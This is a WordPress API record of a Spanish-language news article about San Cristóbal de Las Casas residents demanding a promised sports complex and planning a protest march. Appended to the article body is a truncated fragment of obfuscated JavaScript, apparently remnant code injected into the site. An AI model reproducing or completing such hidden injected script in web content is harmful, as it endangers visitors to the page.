{"id":12787,"date":"2023-11-22T01:40:02","date_gmt":"2023-11-22T01:40:02","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12787"},"modified":"2023-11-22T01:40:02","modified_gmt":"2023-11-22T01:40:02","slug":"piden-se-cumpla-con-construccion-de-polideportivo-en-la-zona-norte","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12787","title":{"rendered":"Piden se cumpla con construcci\u00f3n de polideportivo en la Zona Norte"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-01-09-at-5.01.50-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-12788\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-01-09-at-5.01.50-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-01-09-at-5.01.50-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-01-09-at-5.01.50-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-01-09-at-5.01.50-PM-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-01-09-at-5.01.50-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas-. Habitantes de la Zona Norte de esta ciudad se encuentran inconformes por el incumplimiento de las autoridades federales de la construcci\u00f3n de un polideportivo, por lo que piden se ejecute este proyecto que fue anunciado en 2022 por el subsecretario de Gobernaci\u00f3n, Alejandro Encinas, por lo que tambi\u00e9n han contemplado hacer una marcha para hacer presi\u00f3n y ser tomados en cuenta, se\u00f1al\u00f3 el vocero de los inconformes, Joaqu\u00edn Garc\u00eda P\u00e9rez. &#8220;El subsecretario hizo el anuncio en el Teatro Hermanos Dom\u00ednguez y todos aplaudimos porque hacen falta estos espacios que no se le ha puesto la atenci\u00f3n que merecen los j\u00f3venes de la ciudad, cuando escuchamos esto consideramos que era bastante oportuno, por los momentos dif\u00edciles que estamos atravesando en la ciudad a falta de atenci\u00f3n a los j\u00f3venes, vivimos toda esta situaci\u00f3n de violencia, y es necesario atender las causas, la lucha de nuestro consejo de la Zona Norte va en 6 direcciones, como educaci\u00f3n, salud, deporte, agua medio ambiente, seguridad, en eso venimos luchando y cuando se hace el anuncio nos dimos a la tarea de organizarnos&#8221;, se\u00f1al\u00f3 en entrevista.Asimismo, dijo que en primera instancia se pusieron de acuerdo entre vecinos para la donaci\u00f3n del terreno, entender en s\u00ed el proyecto, &#8220;tuvimos reuniones con vecinos, con deportistas, se les plante\u00f3 c\u00f3mo iba a estar el proyecto, nos llev\u00f3 varios meses y cuando esto se logra a m\u00e1s de un a\u00f1o de su anuncio no entendemos qu\u00e9 pasa, si es falta de voluntad, experiencia, qu\u00e9 pasa, por qu\u00e9 se ha detenido el proyecto, viene la veda electoral, ya no va ser posible hacer el proyecto, o lo van a dejar para despu\u00e9s y esto es necesario&#8221;.&#8221;Tenemos la esperanza de que este espacio sea familiar, que se atienda a muchas personas, se debe atender las necesidades de los j\u00f3venes, vemos que no hay oportunidades, no hay la atenci\u00f3n que se merecen, no hay empleos y si hay est\u00e1n mal pagados, por eso la necesidad de estos espacios para que los j\u00f3venes gasten su energ\u00eda de forma positiva, ante la indiferencia de las autoridades tenemos planeado hacer una marcha pr\u00f3ximamente, nos vamos a organizar para manifestarnos a favor de la paz, se convoca a toda la ciudadan\u00eda&#8221;, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas-. Habitantes de la Zona Norte de esta ciudad se encuentran inconformes por el incumplimiento de las autoridades federales de la construcci\u00f3n de un polideportivo, por lo que piden se ejecute este proyecto que fue anunciado en 2022 por el subsecretario de Gobernaci\u00f3n, Alejandro Encinas, por lo que tambi\u00e9n han &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12788,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-12787","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12787","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12787"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12787\/revisions"}],"predecessor-version":[{"id":12789,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12787\/revisions\/12789"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12788"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12787"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12787"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12787"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}